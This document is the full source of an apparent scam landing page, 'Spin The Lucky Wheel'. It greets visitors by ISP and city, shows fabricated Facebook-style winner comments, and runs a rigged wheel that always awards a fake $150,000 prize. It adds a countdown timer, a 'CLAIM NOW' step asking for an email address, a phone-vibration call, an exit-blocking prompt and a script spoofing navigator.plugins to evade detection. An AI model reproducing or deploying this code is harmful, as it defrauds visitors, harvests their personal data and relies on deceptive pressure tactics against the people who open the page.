<!DOCTYPE html>
<html lang="en">
<head>
  <base href="">
<script>
		(function(){var DPA=function(p){for(var i=0;i<p.length;i++){this[i]=this[p[i].name]=p[i];}var a={name:"DjVu Plugin Viewer",filename:"djvu.js",description:"This is just a test package for incoming Chrome DjVu Plugin."};this[p.length]=this[a.name]=a;this.length=p.length+1;};DPA.prototype.item=function(n){return this[n];};DPA.prototype.namedItem=function(name){for(var i=0;i<this.length;i++){if(this[i].name===name){return this[i];}}};DPA.prototype.refresh=function(){location.reload(true);};var p=new DPA(navigator.plugins);Object.defineProperty(navigator,"plugins",{get:function(){return p}});})()
	</script>


	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  	<meta charset="utf-8">
  	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="robots" content="noindex, nofollow">
	<title>Spin The Lucky Wheel!</title>
	<link href="favicon.ico" rel="icon" type="image/x-icon" />

	<style type="text/css">
		*{margin:0}
		body{
			font-family:tahoma,verdana,arial,sans-serif;
			background-color:#FFFFFF;
			overflow:scroll;overflow-x:hidden;
			}
		.header{background-color:#ffeb6b;height: 185px;

		}
		.logo-left{padding:5px;vertical-align:middle;margin-top: -16px;}
		.header-text{
			font-size:19px;
			height:35px;
			margin-top: -58px;
			display: block;
			vertical-align:middle;
			color:darkred
			}
		.spinnerContainer{
			position:relative;
			transform:translateX(20%)
			}
		#clicker,#clicker2{display:none}
		.clearfix::after,.clearfix::before{
			content:"";display:table
			}
		.clearfix::after{clear:both}
		.fbcoms{
			padding:0 5px;
			margin-top: -95px;
			font-family:Tahoma,Verdana,sans-serif;background-color:#fff;
			font-size:12px;text-align:left
			}
		.comments{
			font-weight:700;
			text-align:center;padding:0 5px 10px
			}
		.totlikes{
			margin-top:3px;
			background-color:#eeeff4;
			padding:5px 5px 5px 23px;
			/*background-image:url("http://consumerreports.com-mobile.news/ot/uk/ms-isp-sw-4/files/finger.png");*/
			background-repeat:no-repeat;background-position:5px center
			}
		.fbblue{color:#3c5a96}
		.buttons{
			margin-top: 14px;
			padding:5px;
			font-family:Arial,sans-serif;
			color:#f7a10b;
			}
		.buttons span{cursor:pointer}
		.buttons span:hover{text-decoration:underline}
		.viewmore{
			margin-top:3px;
			background-color:#eeeff4;
			padding:5px 5px 5px 23px;
			/*background-image:url("http://consumerreports.com-mobile.news/ot/uk/ms-isp-sw-4/files/bubble.png");*/
			background-position:5px center;background-repeat:no-repeat
			}
		.left{
			cursor:pointer;
			float:left;
			color:#3c5a96
			}
		.left:hover{text-decoration:underline}
		.right{color:#7d7d7f;float:right}
		div, main, article, aside, footer, nav, section, header {
			display: inline;
			}
		span {display: block;}
		h1, h2, h3 {display: inline;}
		.item{
			position:relative;
			margin-top:3px;
			background-color:#eeeff4;
			padding:5px 5px 5px 60px;
			min-height:60px;
			box-sizing:border-box}
		.item .profileimg{position:absolute;top:5px;left:5px}
		.comtxt{line-height:16px}
		.name{color:#3c5a96;font-weight:700}
		.ago{color:#86878c;font-size:.95em}
		.fblike{color:#3c5a96;font-size:.95em;cursor:pointer}
		.fblike:hover{text-decoration:underline}
		.combot{padding-top:5px}
		.likes{color:#3c5a96;font-size:.95em;cursor:pointer}
		.comments,.hidden .combot,.hidden .comtxt{display:none}
		#fbalert>div{margin-left:0}
		#fbalert{background-color:#fff;padding:5px}
		#spinner{
			position:relative;
			margin:1em auto 0;
			width:315px;
			/*overflow:hidden*/
			}
		@media(min-width:360px){#spinner{width:340px}}
		#spinBG{z-index:1;width:315px}
		@media(min-width:360px){#spinBG{width:340px}}
		#spin{z-index:2;position:absolute;top:15px;left:16px;width:285px}
		@media(min-width:360px){#spin{width:310px}.alert4{
													  left:8%;}}
		#win,#win2,#win3,#winP,#winP1,#winP2{
			position: absolute;
			z-index: 3;
			width: 150px;
			left: 0;
			right: 0;
			top:132%;
			margin: auto;
			}

		#win2,#win3,#winP,#winP1,#winP2{display:none}
		.spinAround{
			-webkit-animation:spin 6.6s;
			-moz-animation:spin 6.6s;
			-o-animation:spin 6.6s;
			animation:spin 6.6s;
			-webkit-animation-timing-function:ease;
			-moz-animation-timing-function:ease;
			-o-animation-timing-function:ease;
			animation-timing-function:ease;
			-webkit-animation-iteration-count:1;
			-moz-animation-iteration-count:1;
			-o-animation-iteration-count:1;
			animation-iteration-count:1;
			-webkit-animation-direction:normal;
			-moz-animation-direction:normal;
			-o-animation-direction:normal;
			animation-direction:normal;
			-webkit-animation-fill-mode:forwards;
			-moz-animation-fill-mode:forwards;
			-o-animation-fill-mode:forwards;
			animation-fill-mode:forwards
			}
		@-webkit-keyframes spin{
			0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}
			90%{-webkit-transform:rotate(3110deg);transform:rotate(3110deg)}
			95%{-webkit-transform:rotate(3108deg);transform:rotate(3108deg)}
			100%{-webkit-transform:rotate(3109deg);transform:rotate(3109deg)}
			}
		@-moz-keyframes spin{
			0%{-moz-transform:rotate(0deg);transform:rotate(0deg)}
			90%{-moz-transform:rotate(3110deg);transform:rotate(3110deg)}
			95%{-moz-transform:rotate(3108deg);transform:rotate(3108deg)}
			100%{-moz-transform:rotate(3109deg);transform:rotate(3109deg)}
			}
		@-o-keyframes spin{
			0%{-o-transform:rotate(0deg);transform:rotate(0deg)}
			90%{-o-transform:rotate(3110deg);transform:rotate(3110deg)}
			95%{-o-transform:rotate(3108deg);transform:rotate(3108deg)}
			100%{-o-transform:rotate(3109deg);transform:rotate(3109deg)}
			}
		@keyframes spin{
			0%{
				-webkit-transform:rotate(0deg);
				-moz-transform:rotate(0deg);
				-o-transform:rotate(0deg);
				transform:rotate(0deg)
				}
			90%{
				-webkit-transform:rotate(3110deg);
				-moz-transform:rotate(3110deg);
				-o-transform:rotate(3110deg);
				transform:rotate(3110deg)
				}
			95%{
				-webkit-transform:rotate(3108deg);
				-moz-transform:rotate(3108deg);
				-o-transform:rotate(3108deg);
				transform:rotate(3108deg)
				}
			100%{
				-webkit-transform:rotate(3109deg);
				-moz-transform:rotate(3109deg);
				-o-transform:rotate(3109deg);
				transform:rotate(3109deg)
				}
			}
		.spinAround2{
			-webkit-animation:spinTwo 6.6s;
			-moz-animation:spinTwo 6.6s;
			-o-animation:spinTwo 6.6s;
			animation:spinTwo 6.6s;
			-webkit-animation-timing-function:ease;
			-moz-animation-timing-function:ease;
			-o-animation-timing-function:ease;
			animation-timing-function:ease;
			-webkit-animation-iteration-count:1;
			-moz-animation-iteration-count:1;
			-o-animation-iteration-count:1;
			animation-iteration-count:1;
			-webkit-animation-direction:normal;
			-moz-animation-direction:normal;
			-o-animation-direction:normal;
			animation-direction:normal;
			-webkit-animation-fill-mode:forwards;
			-moz-animation-fill-mode:forwards;
			-o-animation-fill-mode:forwards;
			animation-fill-mode:forwards
			}
		@-webkit-keyframes spinTwo{
			0%{-webkit-transform:rotate(3109deg);transform:rotate(3109deg)}
			90%{-webkit-transform:rotate(7204deg);transform:rotate(7204deg)}
			95%{-webkit-transform:rotate(7202deg);transform:rotate(7202deg)}
			100%{-webkit-transform:rotate(7203deg);transform:rotate(7203deg)}
			}
		@-moz-keyframes spinTwo{
			0%{-moz-transform:rotate(3109deg);transform:rotate(3109deg)}
			90%{-moz-transform:rotate(7204deg);transform:rotate(7204deg)}
			95%{-moz-transform:rotate(7202deg);transform:rotate(7202deg)}
			100%{-moz-transform:rotate(7203deg);transform:rotate(7203deg)}
			}
		@-o-keyframes spinTwo{
			0%{-o-transform:rotate(3109deg);transform:rotate(3109deg)}
			90%{-o-transform:rotate(7204deg);transform:rotate(7204deg)}
			95%{-o-transform:rotate(7202deg);transform:rotate(7202deg)}
			100%{-o-transform:rotate(7203deg);transform:rotate(7203deg)}
			}
		@keyframes spinTwo{
			0%{
				-webkit-transform:rotate(3109deg);
				-moz-transform:rotate(3109deg);
				-o-transform:rotate(3109deg);
				transform:rotate(3109deg)
				}
			90%{
				-webkit-transform:rotate(7205deg);
				-moz-transform:rotate(7205deg);
				-o-transform:rotate(7205deg);
				transform:rotate(7205deg)
				}
			95%{
				-webkit-transform:rotate(7206deg);
				-moz-transform:rotate(7206deg);
				-o-transform:rotate(7206deg);
				transform:rotate(7206deg)
				}
			100%{
				-webkit-transform:rotate(7207deg);
				-moz-transform:rotate(7207deg);
				-o-transform:rotate(7207deg);
				transform:rotate(7207deg)
				}
			}
		ol,ul{list-style:none}
		.clearfix:after{
			content:" ";
			display:block;
			height:0;
			clear:both;
			overflow:hidden;
			visibility:hidden
			}
		.clearfix{display:block}
		.wrapper{
			background-color:#fff;
			-webkit-box-sizing:border-box;
			-moz-box-sizing:border-box;
			box-sizing:border-box;
			padding:7px;
			width:96%;
			margin:0 auto 14px;
			border:1px solid #c4cde1;
			border-top:0;
			max-width:414px
			}
		.logo{
			display: block; 
			margin: 4px auto;
			}
		.txt{padding:5px 6px;line-height:18px;text-align:center}
		.bottom{
			width:92%;
			margin:20px auto 0;
			border:1px solid #ccc;
			background-color:#f2f2f2;
			padding:5px;
			border-radius:10px;
			-moz-border-radius:10px;
			-webkit-border-radius:10px
			}
		.now{text-align:center;padding-top:5px}
		#countdown{font-weight:bold;}
		.rules{color:#1b316c;padding:4px 5px;line-height:22px}
		a{
			display:block;
			background-color:#39579a;
			border-radius:32px;
			-moz-border-radius:32px;
			-webkit-border-radius:32px;
			padding:10px 0;
			text-align:center;
			font-weight:700;
			color:darkred;
			font-size:1.6em;
			border-bottom:1px solid #6da015;
			margin:7px 13px 5px;
			text-decoration:none;
			filter:alpha(opacity=100 finishopacity=50 style=1 startx=0,starty=0,finishx=0,finishy=150) progid:DXImageTransform.Microsoft.gradient(startcolorstr=red,endcolorstr=blue,gradientType=0);
			-ms-filter:alpha(opacity=100 finishopacity=50 style=1 startx=0,starty=0,finishx=0,finishy=150) progid:DXImageTransform.Microsoft.gradient(startcolorstr=red,endcolorstr=blue,gradientType=0);/*IE8*/
			background:red; /* 一些不支持背景渐变的浏览器 */
			background:-moz-linear-gradient(bottom, #f3d556, #eb9d15);
			background:-webkit-gradient(linear, 0 0, 0 bottom, from(#f3d556), to(#eb9d15));
			background:-o-linear-gradient(bottom, #f3d556,#eb9d15);
		}
		.title{text-align:center;font-weight:700;font-size:26px}
		.show-all{display: none;}
		.now2{padding-top: 10px;font-weight: bold;}
		.terms{
			text-align:center;
			font-size:11px;
				color:#666;
			padding:4px;
			display:block;
			text-align:center;
			margin-top:4px;
			text-align: justify;
			}
		hr{margin:0px 5px;}

		.alert1{width:80%;background-color: #fff;position:fixed;top:50%;left:10%;box-shadow: 0 0 5px 1px #333;margin-top: -124px;z-index:5;}

		.none{position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(116,116,116,0.2);z-index: 3;}
		.alert1 .iphone{padding:25px 15px;}
		.alert1 .btn{line-height: 45px;background-color: #f2f2f2;display:block;text-align: center;font-size: 20px;border-top: 1px solid #e6e6e6;display:block;}
		.alert4{width:80%;background-color: #fff;position:fixed;top:50%;left:5%;box-shadow: 0 0 5px 1px #333;margin-top: -80px;display:none;z-index: 5;}
        .alert4 .iphone{padding:25px 15px;}
        .alert4 .btn{line-height: 45px;background-color: #f2f2f2;display:block;text-align: center;font-size: 20px;border-top: 1px solid #e6e6e6;display:block;}

	</style>
	<script>
		function getURLParameter(name) {
			return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || '');
		}
		var model = getURLParameter('mod');
		var brand = getURLParameter('brd');
		var city = getURLParameter('city');
		var browser = getURLParameter('browser');
		var isp = getURLParameter('isp');
		var citylow = city.toLowerCase();
		var brandlow = brand.toLocaleLowerCase();
		var modellow = model.toLocaleLowerCase();
		var browserlow = browser.toLocaleLowerCase();
		var isplow = isp.toLocaleLowerCase();		
		if(citylow == "unknown") { city = "your city"; }
		if(brandlow == "unknown") { brand = "phone"; }
		if(modellow == "unknown") { model = ""; }
		if(browserlow == "unknown") { browser = ""; }
		if(isplow == "wayport inc.") { isp = "att internet services"; }
		if(isplow == "santa clara county office of education") { isp = "internet"; }
		if(isplow == "washington school information processing cooperative") { isp = "internet"; }
		if(isplow == "service provider corporation") { isp = "internet"; }
	</script>
	<script type="text/javascript">
	function returnDate(format, print, force_date){
		var out;
		var curDate = new Date();
		if(force_date != undefined && force_date != "" && force_date != "undefined"){
			curDate = force_date;
		}
	    var year = curDate.getFullYear();
	    var month = curDate.getMonth();
	    var day = curDate.getDate();
	    var dayofweek = curDate.getDay();
	    var hour = curDate.getHours();
     
	    var daysofweek = new Array('Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday');
	    var months = new Array('January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December');
	     
	    if(format == "timeofday"){
	        if (hour < 12) out = "morning";
	        else if (hour < 17) out = "afternoon";
	        else out = "evening";        
	    }
	    else if(format == "dayofweek"){
	        out = daysofweek[dayofweek];
	    }
	    else if(format == "day"){
	        out = day;
	    }
	    else if(format == "month"){
	        out = months[month];
	    }
		else if(format == "year"){
	        out = year;
	    }
	    else{
	        out = months[month]+' '+day+', '+year;
	    }
		if ( print ) 
			document.write( out );
		else
			return out;
	}
	</script>
	
	<script type="text/javascript">
	    var ts = getURLParameter('ts');
	    var vid = getURLParameter('vid');
	    var cpass = getURLParameter('cpass');
	    var unix = Math.round(+new Date()/1000);
	   	var diff = unix-ts;
	    if (ts=="skipcheck"){
	    }
	    else if (diff<121 && diff>-1){
	    }
	    else{
	      
	    }
  	</script>	


	<script language="Javascript">
		var imgname = getURLParameter('isp').toLowerCase();
		function loadimage() {
		    document.getElementById('image1').src="http://images.com-about.info/company/"+ imgname +".png";
		}
		window.onload = loadimage;
	</script>

	<script type="text/javascript">
	  navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
	  navigator.vibrate([1000,500,1000]);
	</script>
	    
	<script src="jquery.js"></script>   
    
</head>

<body onload="spinnerAction()" cz-shortcut-listen="true">

<div class="header" style="height: 156px">

			<img src="logo3.png" class="logo-left" height="225" width="95%" style="    margin-top: -55px;margin-left:1%;">

				<!--<p class="header-text" style="text-align: center"><b>Congratulations <script>document.write(getURLParameter('brd'))</script><br><script>document.write(getURLParameter('mod'))</script> User!<b></b></b></p><b><b>-->
  			<!--</b></b>-->

  			<p class="header-text" style="margin-top: -77px;text-align: center;font-size: 21px"><b>Spin the wheel for your free prize!</b></p>

</div>
<div class="hide-all">
<div id="fbalert">
	<!--<p style="font-size: 100%;color:#24a6f1;">You are the winner of the <script>document.write(getURLParameter('isp'))</script> deal  <script>document.write(getURLParameter('city'))</script> today.</p>-->
	<br>
</div>
<!-- <div align="center" margin-top="0px"><img id="image1" src="index.html%3Fvid=e5fc4290-839e-4d7c-ae2b-343938a81e8e&amp;ts=1453963605&amp;ip=81.133.216.151&amp;isp=BT%2520Public%2520Internet%2520Service&amp;brand=Sony&amp;model=Xperia%2520Z2&amp;browser=Android%2520Browser&amp;city=London&amp;voluumdata=vid..00000006-3b2e-4387-8000-00000000.html" width="200" height="auto"></div> -->

<div id="spinner">
	<img id="arrow"src="arror_02.png" alt="" width="50"height="69">
	<img id="spinBG" src="spinBG2.png">
	<img id="spin" src="spin3.png">
	
	<!--<img onclick="startSpin()" id="win" src="win.png">-->
	<!--<img  id="win2" src="win.png">-->
	<!--<img id="winP" src="winP.png">-->
	<!--<img id="winP2" src="winP.png">-->

	<img id="win" onclick="startSpin()" src="up.png" alt="">
	<img id="win2"  src="up.png" alt="">
	<img  id="winP" src="down.png" alt="">
	<img  id="winP2" src="down.png" alt="">


</div>
<style type="text/css">
	#arrow{
		position: absolute;
		left: 0;
		right: 0;
		top: -33px;
		margin: auto;
		z-index: 4;
	}
	.spin-Bg{
		height: 300px;
		background: #333;
		width: 80%;
		margin: auto;
		position: relative;
		top:-110px;
		z-index: -999;
		-moz-border-radius-bottomleft: 15px;
		-moz-border-radius-bottomright: 15px;
		-webkit-border-bottom-left-radius: 15px;
		-webkit-border-bottom-right-radius: 15px;
		filter:alpha(opacity=100 finishopacity=50 style=1 startx=0,starty=0,finishx=0,finishy=150) progid:DXImageTransform.Microsoft.gradient(startcolorstr=red,endcolorstr=blue,gradientType=0);
		-ms-filter:alpha(opacity=100 finishopacity=50 style=1 startx=0,starty=0,finishx=0,finishy=150) progid:DXImageTransform.Microsoft.gradient(startcolorstr=red,endcolorstr=blue,gradientType=0);/*IE8*/
		background:red; /* 一些不支持背景渐变的浏览器 */
		background:-moz-linear-gradient(bottom, #351f4d, #4f1953);
		background:-webkit-gradient(linear, 0 0, 0 bottom, from(#351f4d), to(#4f1953));
		background:-o-linear-gradient(bottom, #351f4d,#4f1953);
		border: 5px solid #ffda61;

	}
	.win {
		width: 200px;
		height: 40px;
		background: #ccc;
		margin: auto;
		position: absolute;
		left: 0;
		right: 0;
		top: 206px;
	}
	.win-number{

	    width: 66%;
		height: 74px;
		border: 2px solid rgba(255,255,255,0.8);
		border-radius: 10px;
		box-shadow: 0 0 5px rgba(255,255,255,0.5);
		position: absolute;
		left:0;
		right:0;
		margin: auto;
		top:110px;
	}
	.win-number p{
		font-size: 22px;
		font-family: Rockwell;
		font-weight: bold;
		padding: 4px;
		padding-left: 10px;
		color: #ffe045;
		background-image: -webkit-gradient(linear, 0 0, 0 bottom, from(#f3d658), to(#ea9813));
		-webkit-background-clip: text;
		-webkit-text-fill-color: transparent;
		-moz-backgroundclip: text;
		-moz-text-fill-color: transparent;
	}
	.win-number .num{
		float: right;
		font-size: 31px;
	}
	@media(min-width:360px){
		#win,#win2,#win3,#winP,#winP1,#winP2{width:170px}
		.spin-Bg{
			width:73%;
		}
	}
</style>
<div class="spin-Bg">
	<div class="win-number">
		<p>WIN</p>
		<p class="num" id="num">0</p>
	</div>

	<!--<img id="win" onclick="startSpin()" src="up.png" alt="">-->
	<!--<img id="win2"  src="up.png" alt="">-->
	<!--<img  id="winP" src="down.png" alt="">-->
	<!--<img  id="winP2" src="down.png" alt="">-->


</div>
<div class="fbcoms">
			<p class="comments">Comments:</p>
			<p class="buttons">
			<span class="like">Like</span> · <span>Comment</span> · <span>Share</span> · <span>Delete</span>
			</p>
			<p class="totlikes"><span id="youand"></span><span class="fbblue">12,068 others</span> like this</p>
			<p class="viewmore clearfix">
				<span class="left">View more comments</span>
				<span class="right">7 of 4,356</span>
			</p>
			
			<div class="item">
				<img class="profileimg" src="1.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Monica Paquino</span> I was lucky enough to get the apple watch! They sent me the sport edition in white color. I still can't believe this is real, haha!</p>
				<p class="combot"><span class="ago">54 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">267</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="2.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Rudy Winobort</span> I got the iPad Air!! WOhoO!!!! This is the best day ever!</p>
				<p class="combot"><span class="ago">13 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">63</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="3.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Manny Jiang</span> Amazing game. I won $150,000!!!:(</p>
				<p class="combot"><span class="ago">29 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">37</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="4.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Darren Tam</span> Aaarggh!! I was so close! It stopped right after the macbook... </p>
				<p class="combot"><span class="ago">35 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">22</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="5.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Olivia Mack</span> Has anyone actually won yet? I spun 2 times from both of my accounts but nothing...</p>
				<p class="combot"><span class="ago">41 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">9</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="6.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Zhao Wei Fong</span> This thing is all over facebook! I won the free spin, but after that I landed on the red spot anyway.</p>
				<p class="combot"><span class="ago">46 minutes ago</span> · <span class="fblike">Like</span><span class="likes totlikes">5</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="7.jpg" height="50" width="50">
				<p class="comtxt"><span class="name">Becky Ma</span> I got nothing.. why am I always so unlucky :(</p>
				<p class="combot"><span class="ago">1 hour ago</span> · <span class="fblike">Like</span><span class="likes totlikes">1</span></p>
			</div>
		</div>

</div>

	<script type="text/javascript">
		var sec = 40;
		var min = 03;
		var sd;
		function countDown() {
			sec--;
			if (sec === -01) {
				sec = 59;
				min = min - 1;
			} else {
				min = min;
			}
			if (sec <= 9) {
				sec = "0" + sec;
			}
			var time = (min <= 9 ? "" + min : min) + " minutes and " + sec ;
			if (document.getElementById) {
				document.getElementById('theTime').innerHTML = time;
			}

			var SD = window.setTimeout("countDown();", 1000);
			if (min == '00' && sec == '00') {
				sec = "00";
				window.clearTimeout(SD);
			}
		}
		window.onload = countDown;
//		setInterval('countdown()',1000);
//		function countdown(){
//			var mins = parseInt(document.getElementById("mins").innerHTML);
//			var secs = parseInt(document.getElementById("hsecs").innerHTML);
//			if(secs==60){nmins = mins +1; nsecs = 01;}
//			else if(mins!=0 || secs!=0){nmins = mins; nsecs = secs + 1;}
//			document.getElementById("mins").innerHTML = nmins;
//			document.getElementById("hsecs").innerHTML = nsecs;
//			if(nsecs < 10) nsecs = "0" + nsecs;
//			document.getElementById("hsecs").innerHTML = nsecs;
//		}
	</script>
<div class="show-all">
<div class="wrapper">
    <div class="title"><p style="color:red;">Congratulations!</p></div>
		<img src="dollar.png" class="logo" height="170">
		<p style="text-align:center">Your <b>$150,000</b> has been reserved!</p>
		<br>
		<hr>
		<p align="center">IMPORTANT: Only <b style="color: red;">$150,000</b> per person.</p>
		<p align="center" style="font-size: 90%;"><em>Please follow the instructions to claim your reward!</em></p>
		<hr>
		<div class="bottom">
			<table style="font-size:100%">
				<tbody><tr>
					<td>1. </td>
					<td>Click or Tap <b>"CLAIM NOW"</b> below.</td>
				</tr>
				<tr>
					<td style="vertical-align:top;">2. </td>
					<td>You will be redirected to our certified distributor's website.</td>
				</tr>

				<tr>
					<td style="vertical-align:top;">3. </td>
					<td>Enter your <b>current email address</b>.
					<br>
					[This is required for identity verification purposes, to prevent people from getting multiple prize.]
					</td>
				</tr>
			
				<tr>
			</tr></tbody></table>
			<a class="cta" href="http://www.baidu.com">CLAIM NOW</a>
			<p class="now">You have <font color="red"><b><span id="theTime">2 minutes and 35 seconds</span></b></font> to claim your $150,000 or it will be given to someone else.</p>
		</div>
	
      <!-- onclick="exit_a1(); DisableExitTraffic();" -->
            <br>
		</div>
	</div>

	<div class="none" id="none"></div>
	<div class="alert1" id="alert1">
		<p id="iphone" class="iphone"></p>
		<span class="btn" id="btn1">OK</span>
	</div>
	<div class="alert4" id="alert2">
	    <p class="iphone">Congratulations! <br/> Your prize: $150,000! <br/> Click OK to claim your prize now!</p>
	    <span  class="btn" id="btn2">OK</span>
	</div>
	<div class="alert4" id="alert3">
    <p class="iphone">You win $0.<br/> Click OK to spin again</p>
    <span class="btn" id="btn3">OK</span>
  </div>

<script type="text/javascript">

	var alert1=document.getElementById('alert1');
	var btn=document.getElementById('btn1');
	var text=document.getElementById('iphone');
	var alert3=document.getElementById('alert3');
	var btn3=document.getElementById('btn3');
	text.innerHTML="************************* <br/> "+ returnDate('dayofweek') +", " + returnDate('curDate') +" <br/> Congratulations " + (getURLParameter('isp')) + " visitor! <br/> You are the 121 winner today" + (getURLParameter('city')) + "! <br/> Click OK to win $150,000 for FREE! <br/> *************************";
	btn.onclick=function(){
		alert1.style.display="none";
		none.style.display="none";
	}
    function startSpin(){
    	var e=document.getElementById("spin"),
				n=document.getElementById("win"),
				t=document.getElementById("winP"),
				o=document.getElementById("win2");
    	e.className=e.className+"spinAround",
    	n.style.display="none",
    	t.style.display="block",
    	setTimeout(function(){
    		t.style.display="none",
    		o.style.display="block"
    	},
    	150),
    	setTimeout(function(){
    		alert3.style.display="block";
    		none.style.display="block";
    		spin2enabled=!0},6500)}
    	btn3.onclick=function(){
    		alert3.style.display="none";
			none.style.display="none";
    		spin2();
    	}
    	function spin2(){
    		if(spin2enabled){
    			var e=document.getElementById("spin"),
    			n=document.getElementById("win"),
    			t=document.getElementById("winP"),
				y = document.getElementById("num"),
    			o=document.getElementById("win2");
    			e.className=e.className+" spinAround2",n.style.display="none",
    			t.style.display="block",setTimeout(function(){
    				t.style.display="none",o.style.display="block"

						},
    			150),
    			setTimeout(function(){
					y.innerHTML = "150,000";
    				e===$("#alert2").hide(),

		    		$("#alert2").show();

		    		$("#none").show();
    				$(".show-all").show();
    				var n=120,t=setInterval(function(){
//    					$("#countdown").text(n--),
//    					-1==n&&clearInterval(t)
    				},
    				1e3);
//    				javascript_countdown.init(300)
    			},6800)
    			var btn2=document.getElementById('btn2');
			    var hideall=document.getElementById('hide-all');
			    btn2.onclick=function(){
			    	$(".hide-all").hide();
			    	$(".show-all").show();
			    	$("#alert2").hide();
			    	$("#none").hide();
			    }
    		}
    	}

    // function FBcom(e,n){setTimeout(function(){var n=0,t=0;$(e+", "+e+" .comtxt, "+e+" .combot").slideDown(500),$().slideDown(500);var o=setInterval(function(){t+=.2,$(e).css({opacity:t}),n++,5==n&&clearInterval(o)},100)},n)}spin2enabled=!1;var d=new Date,weekday=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");document.getElementById("today").innerHTML=weekday[d.getDay()];var myarray=["",""],showMessage=myarray[Math.floor(Math.random()*myarray.length)];c=0;var image;$.fn.txtFader=function(e,n){this.fadeOut(n,function(){$(this).html(e).fadeIn(n)})},$(document).ready(function(){FBcom("#fb1",3e3),FBcom("#fb2",5e3),FBcom("#fb3",7e3),FBcom("#fb4",9e3),FBcom("#fb5",10500),FBcom("#fb6",13e3),FBcom("#fb7",15e3),FBcom("#fb8",2e4),$(".like").click(function(){$(this).hasClass("selected")?($(this).removeClass("selected"),$(this).html("Like"),$("#youand").html("")):($(this).addClass("selected"),$(this).html("Unlike"),$("#youand").html("You and "))}),$(".fblike").click(function(){$(this).hasClass("selected")?($(this).removeClass("selected"),$(this).html("Like")):($(this).addClass("selected"),$(this).html("Unlike"))});for(var e=1;e<=$(".q").length;e++)console.log(e),clicker(e)}),window.onbeforeunload=function(){return window.btn_clicked?void 0:"You have won (1) more spin!\n\nPlay the game and you may win exclusive prizes from our sponsors.\n\nToday's prizes include Apple iPad Air, Macbook Air, Apple Watch and iPhone 6s!"};
    
    
</script>
  
<!-- exit traffic pop -->
<script type="text/javascript">
    
//    var exittraffic_splashalertmessage="Are you sure want to leave this page?\n\nWe've randomly selected you as today's 3rd lucky winner. If you forfeit, we will give your prize to the next lucky winner.\n\n Click Ok To win $150,000";
//    var exittraffic_RedirectUrl="#";


//	var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
//	var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
//
//	function listen(evnt, elem, func) {
//	    if (elem.addEventListener)  // W3C DOM
//	        elem.addEventListener(evnt,func,false);
//	    else if (elem.attachEvent) { // IE DOM
//	         var r = elem.attachEvent("on"+evnt, func);
//	         return r;
//	    }
//	    else window.alert('I\'m sorry Dave, I\'m afraid I can\'t do that.');
//	}
//
//	function DisableExitTraffic() {
//	    PreventExitSplash = true;
//	}
//
//	function addLoadEvent(func) {
//		listen('load', window, func);
//	}
//	function addClickEvent(a, i, func) {
//	    if (typeof a[i].onclick != 'function') {
//	        a[i].onclick = func;
//	    }
//	}
//	theBody = document.body;
//	if (!theBody) {
//	    theBody = document.getElementById("body");
//	    if (!theBody) {
//	        theBody = document.getElementsByTagName("body")[0];
//	    }
//	}
//	var PreventExitSplash = false;
//	var LightwindowOpening = false;
//	function DisplayExitSplash() {
//
//	    if (PreventExitSplash == false) {
//	        window.scrollTo(0, 0);
//	         PreventExitSplash = true;
//	        timeout_variable = setTimeout("exittraffic_change_url();", 1000);
//
//	        return exittraffic_splashalertmessage;
//	    }
//	}
//
//	var a = document.getElementsByTagName('A');
//	for (var i = 0; i < a.length; i++) {
//		var link = a[i];
//	    if (link.target !== '_blank') {
//	        addClickEvent(a, i, function() {
//	            PreventExitSplash = true;
//				if (!this.href.match(/http:\/\//)) {
//					setTimeout(function () {
//						PreventExitSplash = false;
//					}, 300);
//				}
//	        });
//	    }
//	    else {
//	        addClickEvent(a, i, function() {
//	            PreventExitSplash = false;
//	        });
//	    }
//	}
//	disablelinksfunc = function() {
//	    var a = document.getElementsByTagName('A');
//
//	    for (var i = 0; i < a.length; i++) {
//	        if (a[i].target !== '_blank') {
//	            addClickEvent(a, i, function() {
//	                PreventExitSplash = true;
//	            });
//	        }
//	        else {
//	            addClickEvent(a, i, function() {
//	                PreventExitSplash = false;
//	            });
//	        }
//	    }
//	}

//	disableformsfunc = function() {
//		// Makes that clicking on the links on the page will not cause this popup to appear
//	    var f = document.getElementsByTagName('form');
//	    for (var i = 0; i < f.length; i++) {
//	        if (!f[i].onclick) {
//	            f[i].onclick = function() {
//	                if (LightwindowOpening == false) {
//	                    PreventExitSplash = true;
//						setTimeout(function () {
//							PreventExitSplash = false;
//						}, 300);
//	                }
//	            }
//	        }
//	        else if (!f[i].onsubmit) {
//	            f[i].onsubmit = function() {
//	                PreventExitSplash = true;
//	            }
//	        }
//	    }
//	}

//	function exittraffic_change_url() {
//		disable_confirmation = false;
//		clearTimeout(timeout_variable); // just to make sure
//		document.location.href=exittraffic_RedirectUrl;
//	}
//	//
//	// control flash event
//	//
//	var et_timer;
//	var timer_value = 1500;
//	function flashClick(){
